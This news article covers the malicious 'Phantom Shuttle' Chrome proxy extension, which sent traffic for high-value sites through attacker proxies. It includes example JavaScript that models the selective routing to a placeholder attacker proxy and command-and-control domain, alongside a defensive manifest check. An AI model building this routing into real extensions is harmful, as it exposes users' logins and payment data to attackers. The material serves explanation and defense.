- The malicious Google Chrome extension “Phantom Shuttle” secretly redirects traffic through proxy servers controlled by the attackers.
- The extension targets users in China and harvests credentials for roughly 170 high-value domains.
- Google has removed the plugin. Experts warn that browser extensions remain a serious security risk.
Security researchers recently found that two Google Chrome browser extensions were redirecting traffic to high-value sites through attacker-controlled proxy servers, exposing sensitive information to malicious third parties.
Socket reported finding two extensions, both named "Phantom Shuttle", in the Chrome Web Store. They were marketed as proxy clients that let users route their traffic through a proxy and test network speeds, and were aimed mainly at users in China, such as business users who need to test connectivity to different regions of the country.
The extension, first uploaded to the store in 2017, was not free: monthly subscriptions cost between $1.40 and $13.60.
Removed from the store
Beyond its advertised function, however, Phantom Shuttle also routed users' web traffic through proxy servers controlled by the attackers, giving them access to login credentials, payment card details, personal information and more.
Not all traffic was routed this way. The extension only proxied requests to roughly 170 high-value domains, including developer platforms, cloud service consoles, social networks and adult content sites, so that only the most valuable data passed through the attackers' infrastructure.
Local network addresses and the attackers' command-and-control domains were excluded from the list, so the proxying did not trigger warnings. Google has since removed both extensions from the Chrome Web Store; a search for "phantom shuttle" now returns no results.
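The selective routing described above is easy to picture as a PAC-style decision function, which is one way a Chrome extension with the `proxy` permission can steer traffic per host. The block below is an added illustration, not code from the Phantom Shuttle extension or from Socket's report: it models the pattern (a watch-list of high-value domains, local networks and the C2 domain left untouched, everything else sent direct) and pairs it with the manifest triage a defender would run against a suspect extension. Every domain, the proxy address (203.0.113.10, from a documentation range) and the sample manifest are constructed for the example.

```javascript
// Added illustration of the selective-proxy pattern and a defender-side
// manifest check. Not the real extension's code; all names are constructed.

// Constructed stand-in for the extension's list of ~170 high-value domains.
const TARGET_DOMAINS = [
  "git.example-dev.com",        // developer platform
  "console.example-cloud.com",  // cloud console
  "social.example.net",         // social network
];

// Hypothetical command-and-control domain, excluded so the C2 channel itself
// never passes through the proxy.
const C2_DOMAINS = ["update.attacker.example"];

// Hypothetical attacker-controlled proxy, in PAC return-string syntax.
const ATTACKER_PROXY = "PROXY 203.0.113.10:8080";

// True for loopback, link-local and RFC 1918 addresses plus local hostnames.
function isLocalHost(host) {
  if (host === "localhost" || host.endsWith(".local")) return true;
  return /^(127|10|192\.168|169\.254|172\.(1[6-9]|2\d|3[01]))\./.test(host);
}

// Matches the domain itself or any subdomain of it (never a bare suffix match).
function matchesDomain(host, domains) {
  return domains.some(d => host === d || host.endsWith("." + d));
}

// PAC-style decision function, the shape used with chrome.proxy's pac_script
// mode. The browser calls it once per request with the URL and its host.
function FindProxyForURL(url, host) {
  host = host.toLowerCase();
  if (isLocalHost(host)) return "DIRECT";                 // keep LAN traffic working
  if (matchesDomain(host, C2_DOMAINS)) return "DIRECT";   // keep C2 off the proxy
  if (matchesDomain(host, TARGET_DOMAINS)) return ATTACKER_PROXY;
  return "DIRECT";                                        // everything else untouched
}

// Defender side: flag a manifest that declares the combination of capabilities
// this pattern needs. Handles MV2 ("permissions") and MV3 ("host_permissions").
function proxyRiskFlags(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const flags = [];
  if (perms.includes("proxy")) flags.push("proxy");
  if (perms.some(p => p === "<all_urls>" || /^\*:\/\/\*\//.test(p))) flags.push("broad-host-access");
  if (perms.includes("webRequest") || perms.includes("webRequestAuthProvider")) flags.push("webRequest");
  return flags;
}

// Constructed manifest resembling what a proxy helper of this kind would declare.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example Proxy Helper",
  permissions: ["proxy", "storage", "webRequest"],
  host_permissions: ["<all_urls>"],
};

// Walk a few constructed requests through the decision function.
for (const [u, h] of [
  ["https://git.example-dev.com/login", "git.example-dev.com"],
  ["https://news.example.org/", "news.example.org"],
  ["http://192.168.1.1/", "192.168.1.1"],
  ["https://update.attacker.example/", "update.attacker.example"],
]) console.log(h, "->", FindProxyForURL(u, h));
console.log("manifest flags:", proxyRiskFlags(SAMPLE_MANIFEST));
```

Two caveats when using this as a mental model. A plain forwarding proxy sees complete requests only for unencrypted HTTP; for HTTPS it sees the hostname in the CONNECT request and TLS metadata, and reading credentials out of an HTTPS session additionally requires TLS interception with a certificate the browser trusts, which the report summarised here does not describe. So treat the `proxy` permission combined with broad host access as the signal to investigate, and inspect what an installed extension actually requested under chrome://extensions rather than trusting its store description.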
Web browsers are among the most important programs on a modern computer, which makes them a prime target for cybercriminals. The browsers themselves are relatively well hardened (for example, only eight zero-day vulnerabilities were discovered in Chrome in 2025), but extensions run with broad privileges inside the browser, and a malicious or compromised extension lets criminals insert their own code into the browsing session without exploiting the browser at all.
Users should therefore be especially careful about which extensions they install, and should review the permissions an extension requests: a proxy helper that also asks for access to every site is a warning sign.